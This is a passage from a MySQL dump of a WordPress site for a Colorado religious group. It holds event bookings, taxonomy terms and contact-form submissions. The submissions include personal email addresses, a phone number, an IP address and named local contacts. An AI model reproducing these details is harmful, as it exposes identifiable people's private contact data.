10:30:00',1686479400),(342,268619,1000007,'QGV17111',268482,',1,',1,'publish',1,1,0,'2023-06-11 10:30:00',1686479400),(343,268713,1000088,'MPV39039',268685,',1,',1,'publish',1,1,0,'2023-07-02 10:30:00',1688293800),(411,269377,1000094,'GHY43151',269260,',1,',1,'publish',1,1,0,'2023-11-12 10:30:00',1699785000),(388,268866,1000021,'RGL40305',268863,',1,',1,'publish',1,1,0,'2023-08-13 10:30:00',1691922600),(389,268867,1000021,'GES73920',268863,',1,',1,'publish',1,1,0,'2023-08-13 10:30:00',1691922600),(390,268868,1000021,'NQO96287',268863,',1,',1,'publish',1,1,0,'2023-08-13 10:30:00',1691922600),(391,268887,1000091,'EYV69962',268863,',1,',1,'publish',1,1,0,'2023-08-13 10:30:00',1691922600),(392,268890,1000081,'OFC52366',268863,',1,',1,'publish',1,1,0,'2023-08-13 10:30:00',1691922600),(393,268891,1000003,'MAD42041',268863,',1,',1,'publish',1,1,0,'2023-08-13 10:30:00',1691922600),(406,269164,1000021,'UXS79443',269109,',1,',1,'publish',1,1,0,'2023-10-08 10:30:00',1696761000),(405,269163,1000021,'OSR63382',269109,',1,',1,'publish',1,1,0,'2023-10-08 10:30:00',1696761000),(404,269157,1000012,'SOM97240',269109,',1,',1,'publish',1,1,0,'2023-10-08 10:30:00',1696761000),(400,268969,1000092,'OMK70997',268940,',1,',1,'publish',1,1,0,'2023-09-03 10:30:00',1693737000),(401,269027,1000023,'UHB34927',268730,',1,',1,'publish',1,1,0,'2023-09-10 10:30:00',1694341800),(402,269028,1000021,'PFH36224',268730,',1,',1,'publish',1,1,0,'2023-09-10 10:30:00',1694341800),(403,269029,1000061,'KSW83620',268730,',1,',1,'publish',1,1,0,'2023-09-10 10:30:00',1694341800),(407,269169,1000024,'FTM96030',269109,',1,',1,'publish',1,1,0,'2023-10-08 10:30:00',1696761000),(408,269175,1000023,'PHR94097',269109,',1,',1,'publish',1,1,0,'2023-10-08 10:30:00',1696761000),(409,269176,1000061,'TFL56477',269109,',1,',1,'publish',1,1,0,'2023-10-08 10:30:00',1696761000),(410,269177,1000093,'YDN56976',269109,',1,',1,'publish',1,1,0,'2023-10-08 10:30:00',1696761000),(378,268768,1000089,'EQL46700',268685,',1,',1,'publish',1,1,0,'2023-07-02 10:30:00',1688293800),(379,268769,1000090,'PNM51328',268685,',1,',1,'publish',1,1,0,'2023-07-02 10:30:00',1688293800),(380,268782,1000077,'JEC45603',268679,',1,',1,'publish',1,1,0,'2023-07-09 10:30:00',1688898600),(381,268783,1000047,'CEB36442',268679,',1,',1,'publish',1,1,0,'2023-07-09 10:30:00',1688898600),(382,268784,1000024,'QKT59940',268679,',1,',1,'publish',1,1,0,'2023-07-09 10:30:00',1688898600),(383,268785,1000076,'VFQ21754',268679,',1,',1,'publish',1,1,0,'2023-07-09 10:30:00',1688898600),(384,268786,1000023,'HBY28530',268679,',1,',1,'publish',1,1,0,'2023-07-09 10:30:00',1688898600),(385,268787,1000022,'RNE29696',268679,',1,',1,'publish',1,1,0,'2023-07-09 10:30:00',1688898600),(386,268788,1000061,'OJP49096',268679,',1,',1,'publish',1,1,0,'2023-07-09 10:30:00',1688898600),(387,268789,1000024,'ZAH87590',268679,',1,',1,'publish',1,1,0,'2023-07-09 10:30:00',1688898600),(412,269378,1000007,'RYC38070',269260,',1,',1,'publish',1,1,0,'2023-11-12 10:30:00',1699785000),(413,269379,1000023,'JFX18094',269260,',1,',1,'publish',1,1,0,'2023-11-12 10:30:00',1699785000),(414,269380,1000095,'RPB39035',269260,',1,',1,'publish',1,1,0,'2023-11-12 10:30:00',1699785000);
/*!40000 ALTER TABLE `wpcl_mec_bookings` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_mec_bookings` with 228 row(s)
--

--
-- Table structure for table `wpcl_term_taxonomy`
--

DROP TABLE IF EXISTS `wpcl_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=206 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_term_taxonomy`
--

LOCK TABLES `wpcl_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wpcl_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wpcl_term_taxonomy` VALUES (1,1,'category','',0,0),(7,7,'nav_menu','',0,28),(8,8,'nav_menu','',0,0),(9,9,'bg_block_type','',0,0),(10,10,'bg_block_type','',0,0),(11,11,'bg_block_type','',0,0),(12,12,'tribe_events_cat','',0,170),(13,13,'tribe_events_cat','',0,43),(14,14,'tribe_events_cat','',0,70),(15,15,'tribe_events_cat','',0,43),(16,16,'tribe_events_cat','',0,100),(17,17,'tribe_events_cat','',0,68),(19,19,'media_category','',0,0),(20,20,'media_category','',0,0),(21,21,'media_category','',0,0),(22,22,'media_category','',0,0),(23,23,'media_category','',0,1),(24,24,'media_category','',0,1),(25,25,'media_category','',0,2),(26,26,'media_category','',0,2),(27,27,'nt_wmc_folder','',0,1),(28,28,'media_folder','',0,4),(29,29,'media_folder','',0,0),(31,31,'media_folder','',0,2),(32,32,'media_folder','',0,1),(33,33,'media_folder','',0,2),(34,34,'media_folder','',0,13),(35,35,'media_folder','',0,1),(36,36,'media_folder','',0,6),(37,37,'media_folder','',0,16),(39,39,'media_folder','',0,7),(40,40,'media_folder','',0,6),(41,41,'media_folder','',0,0),(42,42,'media_folder','',0,1),(43,43,'media_folder','',0,5),(44,44,'media_folder','',0,3),(45,45,'media_folder','',0,3),(46,46,'media_folder','',0,4),(48,48,'media_folder','',0,1),(49,49,'media_folder','',0,0),(50,50,'media_folder','',0,0),(51,51,'media_folder','',0,1),(52,52,'media_folder','',0,28),(54,54,'media_folder','',0,2),(55,55,'bg_block_type','',0,0),(56,56,'media_folder','',0,10),(57,57,'media_folder','',0,1),(58,58,'media_folder','',52,40),(59,59,'media_folder','',0,1),(60,60,'media_folder','',0,0),(61,61,'media_folder','',0,1),(62,62,'category','',0,0),(63,63,'nav_menu','',0,16),(66,66,'event_listing_type','',0,0),(67,67,'event_listing_type','',0,0),(68,68,'event_listing_type','',0,0),(69,69,'event_listing_type','',0,0),(70,70,'event_listing_type','',0,0),(71,71,'event_listing_type','',0,0),(72,72,'event_listing_type','',0,0),(73,73,'event_listing_type','',0,0),(74,74,'event_listing_type','',0,0),(75,75,'event_listing_type','',0,0),(76,76,'event_listing_type','',0,0),(77,77,'event_listing_type','',0,0),(78,78,'event_listing_type','',0,0),(79,79,'event_listing_type','',0,0),(80,80,'event_listing_type','',0,0),(81,81,'event_listing_type','',0,0),(82,82,'event_listing_type','',0,0),(83,83,'event_listing_type','',0,0),(84,84,'event_listing_type','',0,0),(85,85,'event_listing_type','',0,0),(86,86,'event_listing_category','',0,0),(87,87,'event_listing_category','',0,0),(88,88,'event_listing_category','',0,0),(89,89,'event_listing_category','',0,0),(90,90,'event_listing_category','',0,0),(91,91,'event_listing_category','',0,0),(92,92,'event_listing_category','',0,0),(93,93,'event_listing_category','',0,0),(94,94,'event_listing_category','',0,0),(95,95,'event_listing_category','',0,0),(96,96,'event_listing_category','',0,0),(97,97,'event_listing_category','',0,0),(99,99,'media_folder','',0,4),(101,101,'media_folder','',0,1),(102,102,'tribe_events_cat','',0,2),(103,103,'media_folder','',0,1),(104,104,'media_folder','',0,171),(105,105,'media_folder','',0,4),(106,106,'tribe_events_cat','',0,39),(107,107,'tribe_events_cat','',0,40),(108,108,'media_folder','',0,0),(109,109,'media_folder','',0,0),(110,110,'mec_category','',0,211),(111,111,'mec_category','',0,253),(112,112,'mec_category','',0,244),(113,113,'mec_category','',0,199),(114,114,'mec_category','',0,189),(115,115,'mec_category','',0,226),(116,116,'mec_category','',0,226),(117,117,'mec_category','',0,261),(118,118,'mec_location','',0,150),(119,119,'mec_location','',0,13),(120,120,'mec_location','',0,0),(121,121,'mec_location','',0,1),(122,122,'mec_location','',0,43),(123,123,'mec_location','',0,0),(124,124,'media_folder','',0,0),(126,126,'media_folder','',0,0),(127,127,'media_folder','',0,0),(128,128,'media_folder','',34,0),(129,129,'mec_location','',0,22),(130,130,'media_folder','',0,1),(131,131,'mec_location','',0,34),(132,132,'mec_location','',0,6),(133,133,'media_folder','',108,0),(134,134,'doc_category','',0,0),(135,135,'doc_category','',0,0),(136,136,'doc_category','',0,0),(137,137,'doc_category','',0,0),(141,141,'mec_location','',0,1),(142,142,'media_folder','',0,0),(143,143,'wp_theme','',0,1),(144,144,'mec_location','',0,2),(145,145,'mec_location','',0,1),(146,146,'mec_location','',0,3),(147,147,'mec_location','',0,1),(149,149,'mec_location','',0,2),(150,150,'media_folder','',0,0),(152,152,'wpcode_type','',0,3),(153,153,'wpcode_location','',0,3),(154,154,'wpcode_tags','',0,6),(155,155,'wpcode_tags','',0,3),(156,156,'wpcode_type','',0,3),(157,157,'wpcode_location','',0,3),(158,158,'wpcode_tags','',0,3),(159,159,'wpcode_tags','',0,3),(160,160,'media_folder','',0,0),(161,161,'mec_location','',0,13),(162,162,'mec_location','',0,2),(163,163,'mec_location','',0,1),(164,164,'mec_location','',0,1),(165,165,'mec_location','',0,7),(166,166,'mec_location','',0,8),(167,167,'mec_location','',0,1),(168,168,'media_folder','',0,0),(169,169,'media_folder','',0,0),(170,170,'mec_location','',0,3),(171,171,'mec_location','',0,9),(173,173,'media_folder','',0,0),(174,174,'media_folder','',34,0),(175,175,'media_folder','',174,1),(176,176,'media_folder','',174,0),(177,177,'media_folder','',174,1),(178,178,'media_folder','',174,0),(179,179,'media_folder','',169,1),(180,180,'media_folder','',0,0),(181,181,'media_folder','',34,0),(182,182,'mec_location','Centennial Park in Pagosa Springs',0,1),(183,183,'mec_location','',0,1),(184,184,'mec_location','',0,1),(185,185,'mec_location','',0,26),(186,186,'mec_location','',0,2),(187,187,'mec_location','',0,7),(189,189,'media_folder','',0,2),(190,190,'mec_label','',0,15),(191,191,'mec_label','',0,4),(192,192,'mec_label','',0,39),(193,193,'mec_location','',0,1),(194,194,'mec_label','',0,5),(197,197,'mec_label','',0,2),(198,198,'mec_location','',0,3),(199,199,'media_folder','',173,0),(200,200,'mec_location','',0,1),(201,201,'mec_label','',0,1),(202,202,'mec_label','',0,2),(203,203,'media_folder','',0,0),(204,204,'mec_label','',0,1),(205,205,'media_folder','',0,0);
/*!40000 ALTER TABLE `wpcl_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_term_taxonomy` with 181 row(s)
--

--
-- Table structure for table `wpcl_fluentform_submissions`
--

DROP TABLE IF EXISTS `wpcl_fluentform_submissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_fluentform_submissions` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` int(10) unsigned DEFAULT NULL,
  `serial_number` int(10) unsigned DEFAULT NULL,
  `response` longtext DEFAULT NULL,
  `source_url` varchar(255) DEFAULT NULL,
  `user_id` int(10) unsigned DEFAULT NULL,
  `status` varchar(45) DEFAULT 'unread' COMMENT 'possible values: read, unread, trashed',
  `is_favourite` tinyint(1) NOT NULL DEFAULT 0,
  `browser` varchar(45) DEFAULT NULL,
  `device` varchar(45) DEFAULT NULL,
  `ip` varchar(45) DEFAULT NULL,
  `city` varchar(45) DEFAULT NULL,
  `country` varchar(45) DEFAULT NULL,
  `payment_status` varchar(45) DEFAULT NULL,
  `payment_method` varchar(45) DEFAULT NULL,
  `payment_type` varchar(45) DEFAULT NULL,
  `currency` varchar(45) DEFAULT NULL,
  `payment_total` float DEFAULT NULL,
  `total_paid` float DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=51 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_fluentform_submissions`
--

LOCK TABLES `wpcl_fluentform_submissions` WRITE;
/*!40000 ALTER TABLE `wpcl_fluentform_submissions` DISABLE KEYS */;
INSERT INTO `wpcl_fluentform_submissions` VALUES (1,4,1,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"4e004ddedb\",\"_wp_http_referer\":\"\\/eck-initiator-and-esa-fluent-test\\/\",\"names\":{\"first_name\":\"Testing\",\"last_name\":\"Testing\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Alamosa\",\"dropdown_1\":\"Initiator- Larry Dixon\",\"description\":\"This is a test message\"}','https://eckankar-colorado.org/eck-initiator-and-esa-fluent-test/',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-23 22:10:11','2023-07-29 05:04:22'),(2,4,2,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"4e004ddedb\",\"_wp_http_referer\":\"\\/eck-initiator-and-esa-fluent-test\\/\",\"names\":{\"first_name\":\"Test2\",\"last_name\":\"Testing\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Boulder\",\"dropdown_2\":\"Initiator\\/Lisa Boston\",\"description\":\"Testing\"}','https://eckankar-colorado.org/eck-initiator-and-esa-fluent-test/',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-23 22:13:12','2023-07-29 05:04:22'),(3,4,3,'{\"__fluent_form_embded_post_id\":\"7160\",\"_fluentform_4_fluentformnonce\":\"787ce731d3\",\"_wp_http_referer\":\"\\/?fluent_forms_pages=1&design_mode=1&preview_id=4\",\"names\":{\"first_name\":\"Test\",\"last_name\":\"Testing\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Englewood\",\"dropdown_14\":\"ESA\\/Initiator-Rolf Mueller-Uri\",\"description\":\"This is a test.....\"}','https://eckankar-colorado.org/?fluent_forms_pages=1&design_mode=1&preview_id=4',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-25 22:11:01','2023-07-29 05:04:22'),(4,4,4,'{\"__fluent_form_embded_post_id\":\"7160\",\"_fluentform_4_fluentformnonce\":\"787ce731d3\",\"_wp_http_referer\":\"\\/?fluent_forms_pages=1&design_mode=1&preview_id=4\",\"names\":{\"first_name\":\"Chad\",\"last_name\":\"Tester\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Colorado Springs\",\"dropdown_5\":\"Initiator-Joan Riester\",\"description\":\"Yet another test!\"}','https://eckankar-colorado.org/?fluent_forms_pages=1&design_mode=1&preview_id=4',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-25 22:23:39','2023-07-29 05:04:22'),(5,4,5,'{\"__fluent_form_embded_post_id\":\"7160\",\"_fluentform_4_fluentformnonce\":\"787ce731d3\",\"_wp_http_referer\":\"\\/?fluent_forms_pages=1&design_mode=1&preview_id=4\",\"names\":{\"first_name\":\"jOE\",\"last_name\":\"tESTING\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Loveland\",\"dropdown_7\":\"Initiator-Marcie Tucker\",\"description\":\"This is a test with the new code\"}','https://eckankar-colorado.org/?fluent_forms_pages=1&design_mode=1&preview_id=4',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-25 22:50:02','2023-07-29 05:04:22'),(6,4,6,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"787ce731d3\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Bill\",\"last_name\":\"Tester\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Franktown\",\"dropdown_15\":\"ESA\\/Initiator-Kimberly Young\",\"description\":\"Trying new test with previous code\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-25 22:52:24','2023-07-29 05:04:22'),(7,4,7,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"787ce731d3\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Hal\",\"last_name\":\"Tester\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Akron\",\"dropdown_1\":\"Initiator-Renee Wholey\",\"description\":\"Another test....\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-25 23:05:26','2023-07-29 05:04:22'),(8,4,8,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"787ce731d3\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Ted\",\"last_name\":\"Tester\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Longmont\",\"dropdown_6\":\"Initiator-Vicki Cashman\",\"description\":\"This is a test\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-25 23:15:47','2023-07-29 05:04:22'),(9,4,9,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"e32d67183d\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Mick\",\"last_name\":\"tESTER\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Louisville\",\"dropdown_16\":\"Initiator-Lisa Boston\",\"description\":\"This is another test.............\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-26 04:14:27','2023-07-29 05:04:22'),(10,4,10,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"e32d67183d\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Tad\",\"last_name\":\"Tester\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Pagosa Springs\",\"dropdown_10\":\"Initiator-Lynnzie Sutton\",\"description\":\"New Test............\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-26 04:32:56','2023-07-29 05:04:22'),(11,4,11,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"6d86eb4bb2\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Bob\",\"last_name\":\"Testing\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Franktown\",\"dropdown_15\":\"ESA\\/Initiator-Kimberly Young\",\"description\":\"This is a test\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-26 21:50:08','2023-07-29 05:04:07'),(12,4,12,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"6d86eb4bb2\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Robert\",\"last_name\":\"Jazz\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Pagosa Springs\",\"dropdown_10\":\"Initiator-Lynnzie Sutton\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-26 22:24:00','2023-07-29 05:04:07'),(13,4,13,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"6d86eb4bb2\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Sam\",\"last_name\":\"Tester\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Durango\",\"dropdown_20\":\"Initiator-Kathleen Neal\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-26 22:40:44','2023-07-29 05:04:07'),(14,4,14,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"f627fa3079\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"George\",\"last_name\":\"Tester\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Centennial\",\"dropdown_13\":\"ESA\\/Initiator-Raelin Harp\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-27 04:30:28','2023-07-29 05:04:07'),(15,4,15,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"f627fa3079\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Fred\",\"last_name\":\"Tester\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Centennial\",\"dropdown_13\":\"ESA\\/Initiator-Raelin Harp\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-27 04:42:37','2023-07-29 05:04:07'),(16,4,16,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"a25d4d5f79\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Brad\",\"last_name\":\"Tester\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Alamosa\",\"dropdown_11\":\"Initiator- Larry Dixon\",\"description\":\"Testing\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-27 15:59:32','2023-07-29 05:04:07'),(17,4,17,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"a25d4d5f79\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Roger\",\"last_name\":\"Testing\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Louisville\",\"dropdown_16\":\"ESA\\/Initiator-Tom Boston\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-27 16:59:30','2023-07-29 05:04:07'),(18,4,18,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"a25d4d5f79\",\"_wp_http_referer\":\"\\/?page_id=268811&preview=true\",\"names\":{\"first_name\":\"Allen\",\"last_name\":\"Testing\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Parker\",\"dropdown_8\":\"ESA\\/Initiator-Melony Mont-Eton\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"}','https://eckankar-colorado.org/?page_id=268811&preview=true',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-27 17:16:35','2023-07-29 05:04:07'),(19,4,19,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"8b04fb9526\",\"_wp_http_referer\":\"\\/eck-initiator-and-esa-scheduling-form\\/\",\"names\":{\"first_name\":\"bill\",\"last_name\":\"rogers\"},\"email\":\"wmmrogers@comcast.net\",\"input_text\":\"303-919-7837\",\"input_radio\":\"Denver\",\"dropdown_3\":\"ESA\\/Initiator-Gordon Garland\",\"description\":\"this is a test\"}','https://eckankar-colorado.org/eck-initiator-and-esa-scheduling-form/',0,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-27 17:58:57','2023-07-29 05:04:07'),(20,4,20,'{\"__fluent_form_embded_post_id\":\"268811\",\"_fluentform_4_fluentformnonce\":\"a25d4d5f79\",\"_wp_http_referer\":\"\\/eck-initiator-and-esa-scheduling-form\\/\",\"names\":{\"first_name\":\"Christie\",\"last_name\":\"Gill\"},\"email\":\"choll.03@comcast.net\",\"input_text\":\"555-555-5555\",\"input_radio\":\"Louisville\",\"dropdown_16\":\"Initiator-Lisa Boston\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"}','https://eckankar-colorado.org/eck-initiator-and-esa-scheduling-form/',2,'trashed',0,'Firefox','Windows','76.130.120.198',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-07-27 18:25:04','2023-07-29 05:04:07');
/*!40000 ALTER TABLE `wpcl_fluentform_submissions` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_fluentform_submissions` with 20 row(s)
--

--
-- Table structure for table `wpcl_mec_dates`
--

DROP TABLE IF EXISTS `wpcl_mec_dates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
